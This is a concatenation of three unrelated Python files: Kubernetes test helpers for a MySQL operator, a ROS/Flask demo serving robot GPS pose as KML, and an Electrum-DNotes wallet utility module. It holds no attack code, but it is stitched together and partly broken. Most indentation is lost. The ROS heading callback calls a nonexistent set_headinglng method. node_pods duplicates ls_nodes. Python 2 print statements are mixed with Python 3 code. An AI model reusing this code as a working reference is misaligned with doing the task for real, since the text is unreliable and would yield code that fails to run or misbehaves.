kubectl("exec", None, args + ["-n", ns, "--"] + cmd)
def kill(ns, name, sig, pid):
try:
if type(name) is str:
args = [name]
else:
args = [name[0], "-c", name[1]]
kubectl("exec", None, args +
["-n", ns, "--", "/bin/sh", "-c", f"kill -{sig} {pid}"])
except subprocess.CalledProcessError as e:
if e.returncode == 137:
pass
else:
raise
#
def apply(ns, yaml, *, check=True):
try:
return feed_kubectl(strip_blanks(yaml), "apply", args=[
"-n", ns, "-f", "-"], check=check)
except subprocess.CalledProcessError as e:
print(e.stdout.decode("utf8"))
raise
def patch(ns, rsrc, name, changes, type=None):
kubectl("patch", rsrc, [name, "-p", yaml.dump(changes),
"-n", ns] + (["--type=%s" % type] if type else []))
def patch_pod(ns, name, changes, type=None):
patch(ns, "pod", name, changes, type)
def patch_ic(ns, name, changes, type=None):
patch(ns, "ic", name, changes, type)
#
def ls_nodes():
return split_table(kubectl("get", "nodes").stdout.decode("utf8"))
def node_pods():
return split_table(kubectl("get", "nodes").stdout.decode("utf8"))
def drain_node(node):
pass
#
def wait_pod_exists(ns, name, timeout=120, checkabort=lambda: None):
logger.info(f"Waiting for pod {ns}/{name} to come up")
for i in range(timeout):
pods = ls_po(ns)
for pod in pods:
if pod["NAME"] == name:
logger.info(f"{ns}/{name} is {pod['STATUS']}")
return pod
time.sleep(1)
logger.info("%s", kubectl("get", "pod", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for pod {ns}/{name}")
def wait_pod_gone(ns, name, timeout=120, checkabort=lambda: None):
logger.info(f"Waiting for pod {ns}/{name} to disappear")
i = 0
last_state = None
while i < timeout:
pods = ls_po(ns)
for pod in pods:
if pod["NAME"] == name:
if last_state != pod["STATUS"]:
if last_state and pod["STATUS"] == "Terminating":
# state just switched to Terminating, extend the timeout
i = 0
last_state = pod["STATUS"]
break
else:
logger.info(f"{ns}/{name} is gone")
return True
time.sleep(1)
i += 1
logger.info("%s", kubectl("get", "pod", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for pod {ns}/{name}")
def wait_pod(ns, name, status="Running", timeout=120, checkabort=lambda: None):
if type(status) not in (tuple, list):
status = [status]
def check_status(line):
checkabort()
logger.debug("%s", line)
if line["STATUS"] in ("Error", "ImagePullBackOff", "ErrImageNeverPull", "CrashLoopBackOff") and line["STATUS"] not in status:
raise Exception(f"Pod error: {line['STATUS']}")
print(line)
return line["STATUS"] in status
wait_pod_exists(ns, name, timeout, checkabort)
logger.info(f"Waiting for pod {ns}/{name} to become {status}")
checkabort()
r = watch(ns, "pod", name, check_status, timeout,
format="custom-columns=NAME:.metadata.name,STATUS:.status.phase")
logger.info(f"{r}")
return r
def wait_ic_exists(ns, name, timeout=60, checkabort=lambda: None):
logger.info(f"Waiting for ic {ns}/{name} to come up")
for i in range(timeout):
checkabort()
ics = ls_ic(ns)
for ic in ics:
if ic["NAME"] == name:
logger.info(f"{ns}/{name} is {ic['STATUS']}")
return ic
time.sleep(1)
logger.info("%s", kubectl("get", "ic", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for ic {ns}/{name}")
def wait_ic_gone(ns, name, timeout=120, checkabort=lambda: None):
logger.info(f"Waiting for ic {ns}/{name} to disappear")
last_state = None
i = 0
while i < timeout:
checkabort()
ics = ls_ic(ns)
for ic in ics:
if ic["NAME"] == name:
if last_state != ic["STATUS"]:
if last_state and ic["STATUS"] == "FINALIZING":
# state just switched to FINALIZING, extend the timeout
i = 0
last_state = ic["STATUS"]
break
else:
logger.info(f"{ns}/{name} is gone")
return True
time.sleep(1)
i += 1
logger.info("%s", kubectl("get", "ic", args=[
"-n", ns]).stdout.decode("utf8"))
raise Exception(f"Timeout waiting for ic {ns}/{name}")
def wait_ic(ns, name, status=["ONLINE"], num_online=None, timeout=200, checkabort=lambda: None):
if type(status) not in (tuple, list):
status = [status]
def check_status(line):
checkabort()
logger.debug("%s", line)
return line["STATUS"] in status and (num_online is None or line["ONLINE"] >= str(num_online))
wait_ic_exists(ns, name, timeout, checkabort)
logger.info(
f"Waiting for ic {ns}/{name} to become {status}, num_online={num_online}")
checkabort()
r = watch(ns, "ic", name, check_status, timeout,
format="custom-columns=NAME:.metadata.name,STATUS:.status.cluster.status,ONLINE:.status.cluster.onlineInstances")
logger.info(f"{r}")
return r
#
def portfw(ns, name, in_port):
p = kubectl_popen("port-forward", ["pod/%s" % name, ":%s" %
in_port, "--address", "127.0.0.1", "-n", ns])
line = p.stdout.readline().decode("utf8")
return p, int(line.split("->")[0].split(":")[-1].strip())
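# Illustrative sketch (not part of the original helpers): portfw() starts
# "kubectl port-forward" and parses the first output line to discover the local
# port that was bound. A typical pattern, with hypothetical names, is to keep
# the returned Popen handle and terminate it when done.
def _example_port_forward(ns="testns", pod="mycluster-0"):
    p, local_port = portfw(ns, pod, 3306)
    try:
        print(f"pod {pod} reachable on 127.0.0.1:{local_port}")
    finally:
        p.terminate()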
#
def create_ns(ns):
kubectl("create", "namespace", [ns], ignore=["AlreadyExists"])
def create_testpv(ns, name):
yaml = f"""
apiVersion: v1
kind: PersistentVolume
metadata:
name: {name}
labels:
type: local
spec:
storageClassName: manual
capacity:
storage: 20Gi
accessModes:
- ReadWriteOnce
hostPath:
path: "/tmp/data"
"""
apply(ns, yaml)
def create_secrets(ns, name, data):
nl = "\n"
indent = "\n "
yaml = f"""
apiVersion: v1
kind: Secret
metadata:
name: {name}
data:
{indent.join(data.strip().split(nl))}
"""
apply(ns, yaml)
def create_apikey_secret(ns, name, path, config_name = "config", profile_name = "DEFAULT", privatekey = "key.pem"):
import configparser
ini_parser = configparser.ConfigParser()
ini_parser.read(f"{path}/{config_name}")
if not profile_name in ini_parser:
raise Exception(f"{profile_name} profile not found")
# kubectl doesn't like relative paths
path = pathlib.Path(path).expanduser().absolute()
if not os.path.isfile(f"{path}/{privatekey}"):
raise Exception(f"{path}/{privatekey} doesn't exist")
KEY_FILE_INI_OPTION_NAME = "key_file"
options = [ "generic", name, "-n", ns]
options.append(f"--from-file=privatekey={path}/{privatekey}")
for ini_key, ini_value in ini_parser[profile_name].items():
if ini_key != KEY_FILE_INI_OPTION_NAME:
options.append(f"--from-literal={ini_key}={ini_value}")
kubectl("create", "secret", options)
def create_user_secrets(ns, name, root_user=None, root_host=None, root_pass=None, extra_keys=[]):
data = []
if root_user is not None:
data.append(f"rootUser: {b64encode(root_user)}")
if root_host is not None:
data.append(f"rootHost: {b64encode(root_host)}")
if root_pass is not None:
data.append(f"rootPassword: {b64encode(root_pass)}")
data += extra_keys
create_secrets(ns, name, "\n".join(data))
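# Illustrative sketch (not part of the original helpers): create_user_secrets()
# base64-encodes the root credentials and feeds them through create_secrets()
# and apply(). The namespace, secret name and password below are hypothetical
# placeholders.
def _example_root_secret(ns="testns"):
    create_ns(ns)
    create_user_secrets(ns, "mypwds",
                        root_user="root", root_host="%", root_pass="sakila")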
def create_pod():
pass
if __name__ == "__main__":
testdata = """NAMESPACE NAME READY STATUS RESTARTS AGE
default testpod 1/1 Running 0 38m
docker compose-78f95d4f8c-pj4pl 1/1 Running 0 7h32m
docker compose-api-6ffb89dc58-2fpc2 1/1 Running 0 7h32m
kube-system coredns-5644d7b6d9-qbjrv 1/1 NotRunning 0 7h33m
kube-system coredns-5644d7b6d9-vf6ft 1/1 Running 0 7h33m
kube-system etcd-docker-desktop 1/1 Running 0 7h32m
kube-system kube-apiserver-docker-desktop 1/1 0 7h32m
kube-system kube-controller-manager-docker-desktop 1/1 Running 0 7h32m
kube-system kube-proxy-cxcgf 1/1 Running 0 7h33m
kube-system kube-scheduler-docker-desktop 1/1 Running 0 7h32m
kube-system storage-provisioner 1/1 Running 0 7h32m
kube-system vpnkit-controller 1/1 Running 0 7h32m
mysql-operator mysql-operator-5bfb6dfdb7-mj5tx 1/1 Running 0 6h20m
"""
lines = testdata.strip().split("\n")
splitter = TableSplitter(lines[0])
for l in lines[1:]:
p = splitter.split(l)
print(p)
assert len(p) == len(splitter.columns)
|
frontend_server_ros_demo.py
|
#!/usr/bin/env python
import flask
import math
import rospy
from piksi_rtk_msgs import msg
import time
import threading
POSE_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<kml xmlns="http://www.opengis.net/kml/2.2"
xmlns:gx="http://www.google.com/kml/ext/2.2">
<Document>
<Style id="gecko_icon">
<IconStyle>
<scale>5</scale>
<heading>{heading}</heading>
<Icon>
<href>file://home/gecko/shared/gecko_icon.png</href>
</Icon>
</IconStyle>
</Style>
<Placemark id="tg_robot">
<name>TechnoGecko Robot</name>
<styleUrl>#gecko_icon</styleUrl>
<Point>
<coordinates>{lng},{lat},0</coordinates>
</Point>
</Placemark>
</Document>
</kml>"""
HEADING_OFFSET_DEG = 100
class GuardedPose(object):
def __init__(self):
self._pose_lock = threading.Lock()
self._lat = 0
self._lng = 0
self._heading = 0
    def set_latlng(self, lat, lng):
with self._pose_lock:
self._lat, self._lng = lat, lng
def set_heading(self, heading):
with self._pose_lock:
self._heading = heading
    def get(self):
with self._pose_lock:
return self._lat, self._lng, self._heading
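# Illustrative sketch (not part of the original demo): GuardedPose serializes all
# access through a single lock, so the ROS callback thread can write while the
# Flask request thread reads a consistent (lat, lng, heading) triple. The values
# below are hypothetical; the heading is stored as-is and converted by the
# /tg.kml handler.
def _example_guarded_pose_usage():
    pose = GuardedPose()
    pose.set_latlng(40.786, -119.204)
    pose.set_heading(1.57)
    return pose.get()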
guarded_pose = GuardedPose()
def gps_reader():
    # initialized from a worker thread, so rospy's signal handlers must be disabled
    rospy.init_node('gps_subscriber', disable_signals=True)
position_sub = rospy.Subscriber('/gps_position/baseline_ned', msg.BaselineNed,
position_callback)
heading_sub = rospy.Subscriber('/gps_position/baseline_heading', msg.BaselineHeading,
heading_callback)
    rospy.spin()  # keep this thread (and its subscriber objects) alive
app = flask.Flask(__name__)
@app.route('/tg.kml')
def position():
global guarded_pose
    lat, lng, heading = guarded_pose.get()
    return POSE_TEMPLATE.format(lat=lat, lng=lng,
                                heading=HEADING_OFFSET_DEG + math.degrees(heading))
def position_callback(m):
global guarded_pose
print "Position callback invoked."
guarded_pose.set_latlng(m.lat, m.lng)
def heading_callback(m):
global guarded_pose
print "Heading callback invoked."
guarded_pose.set_headinglng(m.heading)
def main():
print('Starting GPS subscriber...')
threading.Thread(target=gps_reader).start()
print('Starting frontend server...')
    app.run(host='localhost', port=9090)
if __name__ == '__main__':
main()
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
base_units = {'NOTE':8, 'mNOTE':5, 'uNOTE':2}
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
class FileImportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to import from file.") + "\n" + self.message
class FileExportFailed(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
return _("Failed to export to file.") + "\n" + self.message
class TimeoutException(Exception):
def __init__(self, message=''):
self.message = str(message)
def __str__(self):
if not self.message:
return _("Operation timed out.")
return self.message
class WalletFileException(Exception): pass
class BitcoinException(Exception): pass
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class Satoshis(object):
def __new__(cls, value):
self = super(Satoshis, cls).__new__(cls)
self.value = value
return self
def __repr__(self):
return 'Satoshis(%d)'%self.value
def __str__(self):
return format_satoshis(self.value) + " NOTE"
class Fiat(object):
def __new__(cls, value, ccy):
self = super(Fiat, cls).__new__(cls)
self.ccy = ccy
self.value = value
return self
def __repr__(self):
return 'Fiat(%s)'% self.__str__()
def __str__(self):
if self.value.is_nan():
return _('No Data')
else:
return "{:.2f}".format(self.value) + ' ' + self.ccy
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
if isinstance(obj, Satoshis):
return str(obj)
if isinstance(obj, Fiat):
return str(obj)
if isinstance(obj, Decimal):
return str(obj)
if isinstance(obj, datetime):
return obj.isoformat(' ')[:-3]
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
# only prints with --verbose flag
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_stderr(self, *msg):
print_stderr("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
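# Illustrative sketch (not in the original module): the profiler decorator wraps
# a callable and prints "[profiler] <name> <seconds>" via print_error() on every
# call, so it only produces output when verbosity is enabled. The decorated
# function below is a hypothetical example.
@profiler
def _example_slow_sum(n=100000):
    return sum(range(n))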
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum_dnotes.electrum-dnotes'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dnotes_dir = ext_dir + '/electrum-dnotes'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dnotes_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dnotes_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dnotes_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_datadir_available(config_path):
path = config_path
if os.path.exists(path):
return
else:
raise FileNotFoundError(
'Electrum datadir does not exist. Was it deleted while running?' + '\n' +
'Should be at {}'.format(path))
def assert_file_in_datadir_available(path, config_path):
if os.path.exists(path):
return
else:
assert_datadir_available(config_path)
raise FileNotFoundError(
'Cannot find file but datadir is there.' + '\n' +
'Should be at {}'.format(path))
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast string to bytes() like object, but for python2 support it's bytearray copy
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020A'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-dnotes")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum DNotes")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum DNotes")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, num_zeros=0, decimal_point=8, precision=None, is_diff=False, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
if precision is None:
precision = decimal_point
decimal_format = ".0" + str(precision) if precision > 0 else ""
if is_diff:
decimal_format = '+' + decimal_format
result = ("{:" + decimal_format + "f}").format(x / pow (10, decimal_point)).rstrip('0')
integer_part, fract_part = result.split(".")
dp = localeconv()['decimal_point']
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
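# Illustrative examples (not in the original module), assuming the default
# decimal_point=8 and a locale whose decimal separator is ".":
def _example_format_satoshis():
    print(format_satoshis(1234500000))                # "12.345"
    print(format_satoshis(1234500000, is_diff=True))  # "+12.345"
    print(format_satoshis(None))                      # "unknown"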
def format_fee_satoshis(fee, num_zeros=0):
return format_satoshis(fee, num_zeros, 0, precision=1)
def timestamp_to_datetime(timestamp):
if timestamp is None:
return None
return datetime.fromtimestamp(timestamp)
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
mainnet_block_explorers = {
'Biteasy.com': ('https://www.biteasy.com/blockchain/',
{'tx': 'transactions/', 'addr': 'addresses/'}),
'Bitflyer.jp': ('https://chainflyer.bitflyer.jp/',
{'tx': 'Transaction/', 'addr': 'Address/'}),
'Blockchain.info': ('https://blockchain.info/',
{'tx': 'tx/', 'addr': 'address/'}),
'blockchainbdgpzk.onion': ('https://blockchainbdgpzk.onion/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockr.io': ('https://btc.blockr.io/',
{'tx': 'tx/info/', 'addr': 'address/info/'}),
'Blocktrail.com': ('https://www.blocktrail.com/NOTE/',
{'tx': 'tx/', 'addr': 'address/'}),
'BTC.com': ('https://chain.btc.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'Chain.so': ('https://www.chain.so/',
{'tx': 'tx/NOTE/', 'addr': 'address/NOTE/'}),
'Insight.is': ('https://insight.bitpay.com/',
{'tx': 'tx/', 'addr': 'address/'}),
'TradeBlock.com': ('https://tradeblock.com/blockchain/',
{'tx': 'tx/', 'addr': 'address/'}),
'BlockCypher.com': ('https://live.blockcypher.com/btc/',
{'tx': 'tx/', 'addr': 'address/'}),
'Blockchair.com': ('https://blockchair.com/bitcoin/',
{'tx': 'transaction/', 'addr': 'address/'}),
'blockonomics.co': ('https://www.blockonomics.co/',
{'tx': 'api/tx?txid=', 'addr': '#/search?q='}),
'system default': ('blockchain:/',
{'tx': 'tx/', 'addr': 'address/'}),
}
testnet_block_explorers = {
'Blocktrail.com': ('https://www.blocktrail.com/tBTC/',
{'tx': 'tx/', 'addr': 'address/'}),
'system default': ('blockchain://000000000933ea01ad0ee984209779baaec3ced90fa3f408719526f8d77f4943/',
{'tx': 'tx/', 'addr': 'address/'}),
}
def block_explorer_info():
from . import constants
return testnet_block_explorers if constants.net.TESTNET else mainnet_block_explorers
def block_explorer(config):
return config.get('block_explorer', 'Blocktrail.com')
def block_explorer_tuple(config):
return block_explorer_info().get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return ''.join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
from . import bitcoin
from .bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise Exception("Not a bitcoin address")
return {'address': uri}
u = urllib.parse.urlparse(uri)
if u.scheme != 'dnotes':
raise Exception("Not a bitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urllib.parse.parse_qs(query)
else:
pq = urllib.parse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise Exception("Invalid DNotes address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
        m = re.match(r'([0-9.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message']
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bh2u(bitcoin.base_decode(out['sig'], None, base=58))
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if on_pr and (r or (name and sig)):
def get_payment_request_thread():
from . import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
if on_pr:
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
from . import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
query.append('message=%s'%urllib.parse.quote(message))
p = urllib.parse.ParseResult(scheme='dnotes', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urllib.parse.urlunparse(p)
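# Illustrative sketch (not in the original module): create_URI() emits a
# "dnotes:" URI whose query string parse_URI() can round-trip. The address
# argument is a hypothetical placeholder; both helpers validate it with
# bitcoin.is_address(), so a real address is required in practice.
def _example_payment_uri(addr):
    uri = create_URI(addr, 150000000, "coffee")  # 1.5 NOTE, message "coffee"
    return parse_URI(uri)  # -> {'address': ..., 'amount': 150000000, 'message': 'coffee', ...}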
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
#TODO: py3
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import builtins
builtin_raw_input = builtins.input
builtins.input = raw_input
def parse_json(message):
# TODO: check \r\n pattern
n = message.find(b'\n')
if n==-1:
return None, message
try:
j = json.loads(message[0:n].decode('utf8'))
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = b''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error as err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = b''
except:
traceback.print_exc(file=sys.stderr)
data = b''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
out = out.encode('utf8')
self._send(out)
def send_all(self, requests):
out = b''.join(map(lambda x: (json.dumps(x) + '\n').encode('utf8'), requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
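# Illustrative sketch (not in the original module): QueuePipe gives two
# in-process endpoints the same get()/send() interface as SocketPipe, which lets
# a client and a server loop be wired together without a socket. The pairing
# below is one possible arrangement; each side's send queue is the other's get
# queue.
def _example_queue_pipe_pair():
    a_to_b, b_to_a = queue.Queue(), queue.Queue()
    client = QueuePipe(send_queue=a_to_b, get_queue=b_to_a)
    server = QueuePipe(send_queue=b_to_a, get_queue=a_to_b)
    client.send({'method': 'server.version'})
    return server.get_all()  # -> [{'method': 'server.version'}]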
